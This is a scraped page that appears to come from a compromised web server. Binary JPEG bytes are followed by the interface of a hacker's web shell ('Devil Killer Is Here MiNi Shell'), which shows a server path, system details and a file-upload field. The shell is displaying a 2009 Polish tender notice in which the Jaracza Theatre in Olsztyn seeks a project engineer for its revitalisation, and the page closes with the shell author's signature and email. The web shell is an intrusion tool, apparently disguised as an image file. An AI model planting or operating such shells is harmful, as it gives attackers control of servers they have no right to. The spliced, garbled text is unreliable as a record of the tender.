JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090813/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090813/278528-N-2009.html

<p class="kh_header"><b>Olsztyn: Pełnienie funkcji Inżyniera Projektu przy realizacji inwestycji
Rewitalizacja Teatru  im. Stefana Jaracza w Olsztynie.  
Projekt współfinansowany ze środków:
Programu Operacyjnego Infrastruktura i Środowisko
Priorytet XI Kultura i dziedzictwo kulturowe 
Działanie 11.1. Ochrona i zachowanie dziedzictwa kulturowego o zasięgu ponadregionalnym</b><br>
<b>Numer ogłoszenia: 278528 - 2009; data zamieszczenia: 13.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Teatr im. Stefana Jaracza , ul. 1-go Maja 4, 10-118 Olsztyn, woj. warmińsko-mazurskie, tel. 089 5275959 w.22, 5274446, faks 089 5274446.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.teatr.olsztyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Instytucja Kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji Inżyniera Projektu przy realizacji inwestycji
Rewitalizacja Teatru  im. Stefana Jaracza w Olsztynie.  
Projekt współfinansowany ze środków:
Programu Operacyjnego Infrastruktura i Środowisko
Priorytet XI Kultura i dziedzictwo kulturowe 
Działanie 11.1. Ochrona i zachowanie dziedzictwa kulturowego o zasięgu ponadregionalnym.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Pełnienie funkcji Inżyniera Projektu przy realizacji inwestycji
Rewitalizacja Teatru  im. Stefana Jaracza w Olsztynie  
Budynek teatru objęty jest  prawną ochroną konserwatorską i wpisany do rejestru zabytków woj. warmińsko-mazurskiego pod nr A - 2909.
   	Oznaczenie wg Wspólnego Słownika Zamówień: Kod CPV 71520000-9 - usługi nadzoru budowlanego 71540000-5 usługi zarządzania budową,  71248000-8 - nadzór nad projektem i dokumentacją.

	Usługa obejmuje:

I	Etap - czynności przed rozpoczęciem robót - weryfikację dokumentacji   projektowej, przygotowanie dokumentacji przetargowej i udział w przetargu
II	Etap  -  nadzór nad realizacją robót
III	Etap  -  czynności rozliczeniowe
IV	Etap  - odbiór robót  i przekazanie inwestycji do użytkowania
V	Etap  -  czynności w okresie gwarancji i rękojmi

Szczegółowy zakres  usług wg załącznika nr 1

Skrócony opis zadania:
 
Rozbudowa, przebudowa i remont całego obiektu o:
powierzchni zabudowy : 2796.75 m2
powierzchni użytkowej : 6855.81 m2
kubaturze : 34580.00 m3
 
obejmująca  m.in.:

1)	roboty rozbiórkowe,
2)	remont i modernizację widowni Dużej Sceny (strop nad widownią, przebudowa konstrukcji balkonu, kompletne wyposażenie-fotele, oświetlenie itp.),
3)	wykonanie mostu świetlnego w obrębie widowni Dużej Sceny (nad proscenium) oraz konstrukcji świetlnych na obu galeriach widowni wraz z montażem nowych reflektorów scenicznych,
4)	remont i modernizację kabin: oświetleniowej i akustycznej Dużej Sceny 
5)	wybudowanie nowego studia nagrań
6)	przebudowę i modernizację sceny Kameralnej polegającą m.in. na:
wybudowaniu komina scenicznego z mechanizmami wyciągów scenicznych (sztankietów), 
wykonaniu drewnianej podłogi scenicznej 
stworzeniu nowych stanowisk obsługi akustycznej i elektrycznej, 
wykonaniu nowej widowni 
modernizacji zaplecza scenicznego (stanowisko inspicjenta, garderoby, łazienki wraz z kompletnym wyposażeniem),
modernizacji pomieszczeń dostępnych dla publiczności (klatki schodowe, foyer, sanitariaty, windy dla niepełnosprawnych, szatnie, drogi ewakuacyjne)   
7)	wybudowanie nowego budynku z przeznaczeniem na siedzibę sceny Margines w tym:
wyposażenie sceny: w kratownice, galerie obsługi, z zainstalowanym sprzętem technologicznym, oświetleniowym, akustycznym, 
wykonanie drewnianej podłogi scenicznej, 
wykonanie widowni,
urządzenie zaplecza scenicznego (stanowisko inspicjenta, garderoby, sanitariaty)
wykonanie pomieszczeń dostępnych dla publiczności (klatki schodowe, foyer, sanitariaty, windy dla niepełnosprawnych, szatnie, drogi ewakuacyjne)   
8)	wybudowanie dwóch sal prób wraz z wyposażeniem (sprzęt oświetleniowy, akustyczny), drewniane podłogi sceniczne, okotarowanie itp.
9)	wykonanie pełnej technologii scenicznej w obrębie nowo budowanych i remontowanych scen oraz sal prób, obejmującej technologię akustyki wnętrz z elementami budowlanymi ochrony przed hałasem, wszelkie instalacje specjalistyczne, urządzenia techniczne, ich zasilania i napędy oraz zainstalowanie sprzętu wyposażenia technologicznego (m.in. nagłośnienie, oświetlenie, okotarowanie, drewniane podłogi sceniczne, sztankiety, kratownice, systemy łączności inspicjenta  itp.)
10)	przebudowę całego zaplecza Teatru powodującą zmianę funkcji poszczególnych pomieszczeń wraz z ich kompletnym wyposażeniem (pomieszczenia biurowe, garderoby, sanitariaty, magazyny kostiumów, rekwizytów i mebli, pomieszczenia socjalne, itp.)
11)	przebudowę dachu nad malarnią teatralną oraz jej kompletny remont
12)	wykonanie nowej pracowni ślusarskiej
13)	wykonanie nowych instalacji wod.-kan., c.o., ciepła technologicznego, wentylacji i klimatyzacji z przyłączami i węzłem cieplnym oraz instalacji elektrycznej - w całym budynku teatru.
14)	prace konserwatorskie i restauratorskie pozwalające na zachowanie oryginalnych rozwiązań historycznych
15)	wykonanie nowe elewacji wraz ze stolarką z odtworzeniem jej historycznego charakteru,
16)	urządzenie terenu - schody, nawierzchnie, ogrodzenie, zieleńSzczegółowy opis robót obejmuje:
 
1.	Dokumentacja projektowa wykonana przez Biuro MAAG s.c. - Andrzej Maląg, Anna Maląg - 01-228 Warszawa, ul. Klonowicza 2/58.
2.	Pozwolenie na remont - rewitalizację teatru - Decyzja Nr 68/08 z dn. 29.02.2008r. (pismo znak MKZ.4045-144/08) Miejski Konserwator Zabytków.
3.	Decyzja nr II - 151/2008 z 06.03.2008r. pozwolenie na remont przebudowę i rozbudowę istniejącego budynku Teatru  im. Stefana Jaracza w Olsztynie, w ramach projektu Rewitalizacja Teatru  im. Stefana Jaracza w Olsztynie..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9, 71.54.00.00-5, 71.24.80.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 16.04.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> wymagane wadium 5000,00zł<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 7.Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny  spełniania tych  warunków:
7.1. O zamówienie mogą ubiegać się wykonawcy, którzy spełniają następujące  warunki:
a)posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
b)posiadają  niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym  i osobami zdolnymi do wykonania zamówienia lub przedstawia pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.
c)znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
d)nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 Ustawy Prawo zamówień publicznych.
7.2. Szczegółowe warunki udziału w postępowaniu:

1)W zakresie warunku wskazanego w ppkt 7.1 lit. a) ocena spełnienia warunku nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów, o których mowa w pkt 8 ppkt 3).
2)W zakresie warunku wskazanego w ppkt 7.1 lit. b) posiadania niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania Zamówienia Wykonawca musi wykazać:
2.1. doświadczenie: 
a)w okresie ostatnich 3 lat, (licząc od dnia wszczęcia postępowania), a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie, wykonał z należytą starannością co najmniej 1 usługę, odpowiadającą swoim rodzajem usłudze stanowiącej przedmiot tego zamówienia - pełnienie funkcji Inżyniera projektu /kontraktu, Inwestora zastępczego lub kompleksowego nadzoru nad robotami budowlanymi w zakresie budowy, przebudowy lub modernizacji obiektów kubaturowych, która dotyczyła sceny  teatralnej lub operowej,
b)w okresie ostatnich 3 lat, (licząc od dnia wszczęcia postępowania), a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie, wykonał z należytą starannością co najmniej 1 usługę, odpowiadającą swoim rodzajem usłudze stanowiącej przedmiot tego zamówienia - pełnienie funkcji Inżyniera projektu /kontraktu, Inwestora zastępczego lub kompleksowego nadzoru nad robotami budowlanymi w zakresie budowy, przebudowy lub modernizacji obiektów kubaturo?wych, która była realizowana w obiekcie podlegającym opiece konserwatora zabytków,
c)w okresie ostatnich 3 lat, (licząc od dnia wszczęcia postępowania), a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie, wykonał z należytą starannością co najmniej 1 usługę, odpowiadającą swoim rodzajem usłudze stanowiącej przedmiot tego zamówienia - pełnienie funkcji Inżyniera projektu /kontraktu, Inwestora zastępczego lub kompleksowego nadzoru nad robotami budowlanymi w zakresie budowy, przebudowy lub modernizacji obiektów kubaturowych, która obejmowała rozliczenie zadania współfinansowanego ze środków unijnych.
(Dopuszcza się spełnienie powyższych warunków w jednej usłudze).
W przy?padku występowania Wykonawcy zatrudniającego podwykonawcę warunek musi być spełniony przez głównego wykonawcę. Za podwykonawstwo będzie się uznawało: umowę zlecenia, umowę o dzieło itp.
Do wykazu należy dołączyć dokumenty potwierdzające, że usługi te zostały wykonane należycie. 
2.2. potencjał kadrowy: wykonawca musi posiadać do dyspozycji niezbędny potencjał  kadrowy wykwalifikowany w celu obsadzenia podanych niżej stanowisk:
a)Przedstawiciel Inżyniera -  Koordynator, minimalne wymagania:
-wykształcenie wyższe techniczne
-co najmniej 8-letnie doświadczenie zawodowe w budownictwie w zakresie budowy obiektów kubaturowych (w tym realizacja przynajmniej jednego obiektu typu teatr, kino,  amfiteatr,  sala koncertowa, hala sportowa, widowiskowa),
-doświadczenie w pełnieniu funkcji kierowniczych w zespole Inżyniera projektu (kontraktu)/Inwestora zastępczego,
uprawnienia do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej
przynależność do właściwej Izby Inżynierów Budownictwa.
b)Zespół osób do weryfikacji dokumentacji, który powinien obejmować projektantów:
specjalności architektonicznej,
specjalności konstrukcyjno-budowlanej,
specjalności elektrycznej,
specjalności sanitarnej
oraz specjalistę ds. techniki scenicznej i specjalistę z zakresu kosztorysowania robót
Zgodnie z ustawą o samorządach zawodowych architektów, inżynierów budownictwa i urbanistów (Dz.U. Nr 5, poz.42 z 2001r. z późń. zm.) projektanci muszą posiadać uprawnienia projektowe w wymaganej specjalności i muszą być członkami właściwych izb samorządu zawodowego.
c)Inspektor nadzoru - w specjalności konstrukcyjno-budowlanej. Minimalne wymagania:
wykształcenie wyższe w zakresie budownictwa o specjalności konstrukcyjno-budowlanej umożliwiające kierowanie robotami konstrukcyjno-budowlanymi,
uprawnienia do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej,
co najmniej 5-letnie doświadczenie w nadzorze robót,
doświadczenie w nadzorze obiektu ze sceną teatralną lub operową obejmującą  technologie sceniczne,
doświadczenie w nadzorze konserwatorskim - co najmniej 2-letnią praktykę zawodową na budowie przy zabytkach nieruchomych zgodnie z rozporządzeniem Ministra Kultury z dn. 09.06.2004r. (Dz.U. Nr 150 z dn.30.06.2004r. poz. 1579 § 8 ust. 1,2)
przynależność do właściwej Izby Inżynierów Budownictwa.
d)Inspektor nadzoru o specjalności sanitarnej. Minimalne wymagania:
wykształcenie wyższe w zakresie budownictwa o specjalności instalacyjnej umożliwiające kierowanie robotami w specjalności instalacyjnej,
posiadający uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci,  instalacji i urządzeń cieplnych, wentylacyjnych, gazowych wodociągowych i kanalizacyjnych,
co najmniej 5-letnie doświadczenie w nadzorze robót sanitarnych w tym instalacje ciepła  technologicznego, węzeł cieplny, wentylacja i klimatyzacja;
przynależność do właściwej Izby Inżynierów Budownictwa
e)Inspektor nadzoru o specjalności elektrycznej. Minimalne wymagania:
wykształcenie wyższe  w zakresie budownictwa o specjalności elektrycznej umożliwiające kierowanie robotami w specjalności instalacyjnej, 
posiadający uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji elektrycznych i elektroenergetycznych,
co najmniej 5-letnie doświadczenie w nadzorze robót elektrycznych
doświadczenie w nadzorowaniu nagłośnienia i oświetlenia sceny, sieci    strukturalnych i teletechnicznych, instalacji elektroakustycznych i instalacji nagłośnienia,
przynależność do właściwej Izby Inżynierów Budownictwa
f)Inspektor ds. techniki scenicznej. Minimalne wymagania:
wykształcenie wyższe techniczne
doświadczenie w zakresie technologii robót i urządzeń scenicznych (projektowanie, nadzór)
g)Specjalista ds. konserwatorskich:
spełniający wymagania zgodnie z rozporządzeniem Ministra Kultury z dn. 09.06.2004r. (Dz.U. Nr 150 z dn.30.06.2004r. poz.1579 §7 ust. 1,2)
h)Specjalista ds. rozliczeń:
co najmniej 2-letnie doświadczenie w rozliczaniu zadań inwestycyjnych (w tym przynajmniej jednego przedsięwzięcia współfinansowanego ze środków Unii Europejskiej)
Zamawiający dopuszcza jednocześnie pełnienie przez jedną osobę funkcji inspektora nadzoru w specjalności konstrukcyjno-budowlanej i koordynatora pod warunkiem posiadania odpowiedniego wykształcenia i doświadczenia oraz uprawnień. 
W przypadku dysponowania osobami innego podmiotu do wzoru nr 4 wykonawca zobowiązany jest załączyć pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.
3)W zakresie warunku wskazanego w  ppkt 7.1 lit. c) znajdowania się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie Zamówienia wykonawca musi:
a)przedstawić kserokopię polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na wartość co najmniej 500.000 złotych (słownie: pięćset tysięcy złotych)
b)udokumentować wysokość obrotów jako średnią z trzech ostatnich lat w wysokości co najmniej 700.000 zł.
4)W zakresie warunku wskazanego w ppkt 7.1 lit. d), że nie podlegają wykluczeniu z Postępowania, zgodnie z art. 24 Ustawy Pzp ocena spełnienia warunku nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów, o których mowa w pkt 8. 
Zamawiający dokona oceny spełnienia warunków na podstawie załączonych do wniosku  oświadczeń i dokumentów, przy zastosowaniu formuły: spełnia/nie spełnia.

Wykonawcy spełniający wszystkie wymagane warunki otrzymują 10 pkt.  
Zamawiający zastosuje dodatkową punktację:
za każdy nadzorowany obiekt podlegający opiece konserwatora zabytków powyżej 1 wymaganego, przyznaje  się 1 pkt.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 8.Wykaz dokumentów lub oświadczeń, jakie wykonawcy mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu.

Wykonawca zobowiązany jest do przedstawienia następujących dokumentów w ko-lejności:

1)Wypełniony wniosek (wg wzoru nr 1). Wniosek musi być sporządzony w języku polskim. Dokumenty sporządzone w języku obcym muszą być złożone wraz z tłumaczeniem na język polski.
2)Podpisane oświadczenie wykonawcy, że nie podlega wykluczeniu z postępowania na podstawie art.   24 ustawy prawo zamówień publicznych i spełnia warunki określone w art. 22 Ustawy Prawo Zamówień Publicznych (wg wzoru 2),
3)Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.
4)Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art.24 ust.1 pkt 4-8 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem składania  wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.
5)Aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art.24 ust.1 pkt 9 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem składania  wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.
6)Aktualne zaświadczenie  właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.
7)Wykaz wykonanych usług w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania (Do wykazu należy dołączyć dokumenty potwierdzające, że usługi te zo-stały wykonane należycie wystawione przez podmiot zlecający wykonanie zamówienia)- zgodnie z wzorem Nr 3.
8)wykazu osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności (wg wzoru nr 4). Do wykazu należy dołączyć kserokopie dokumentu stwierdzającego wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
9)Pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie osób i podmiotów wykonawca wskazał osoby, którymi będzie dysponował.
10)Kserokopia polisy ubezpieczeniowej, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.
11)Część sprawozdania finansowego tj. bilans i rachunek zysków i strat za lata 2006, 2007, 2008.

Wszystkie kserokopie i odpisy dokumentów wymaganych w ofercie muszą być poświadczone za zgodność z oryginałem przez osobę upoważnioną do reprezentowania wykonawcy.

Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej zamiast dokumentów o których mowa w pkt 8 ppkt. 3), 4),5),6), składa dokumenty wystawione zgodnie z prawem kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: nie otwarto jego likwidacji; ani nie ogłoszono upadłości; nie orzeczono wobec niego zakazu ubiegania się o zamówienie; nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.

Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszka?nia - nie wydaje się dokumentów, o których mowa w pkt 8 pkt. 3 zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pocho?dzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania.

Brak spełnienia któregokolwiek  warunku spowoduje wykluczenie Wykonawcy z niniejszego postępowania.

Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana według formuły spełnia - nie spełnia, na podstawie analizy załączonych dokumentów. 
W toku dokonywania badania i oceny złożonych ofert Zamawiający może żądać udzielenia przez Wykonawców wyjaśnień  treści złożonych przez nich ofert..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg ograniczony.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 10.</p><br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.teatr.olsztyn.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Teatr im. Stefana Jaracza w Olsztynie
ul. 1 Maja 4
10-118 Olsztyn
p.44 lub 46.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.08.2009 godzina 10:00, miejsce: Teatr im. Stefana Jaracza w Olsztynie
ul. 1 Maja 4
10-118 Olsztyn
p.44 (sekretariat).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.Zamówienie będzie realizowane przez cały okres realizacji inwestycji  Rewitalizacja Teatru im. Stefana Jaracza w Olsztynie oraz okres jej rozliczania.

2.Zamawiający dopuszcza zmianę terminu wykonania zamówienia w przypadku gdy ulegnie przedłużeniu okres realizacji robót przy wykonywaniu inwestycji  Rewitalizacja Teatru im. Stefana Jaracza w Olsztynie.

3.Wszystkie wzory druków oraz załącznik nr 1 znajdują się na stronie internetowej Zamawiającego - www.teatr.olsztyn.pl

Creat By MiNi SheLL
Email: jattceo@gmail.com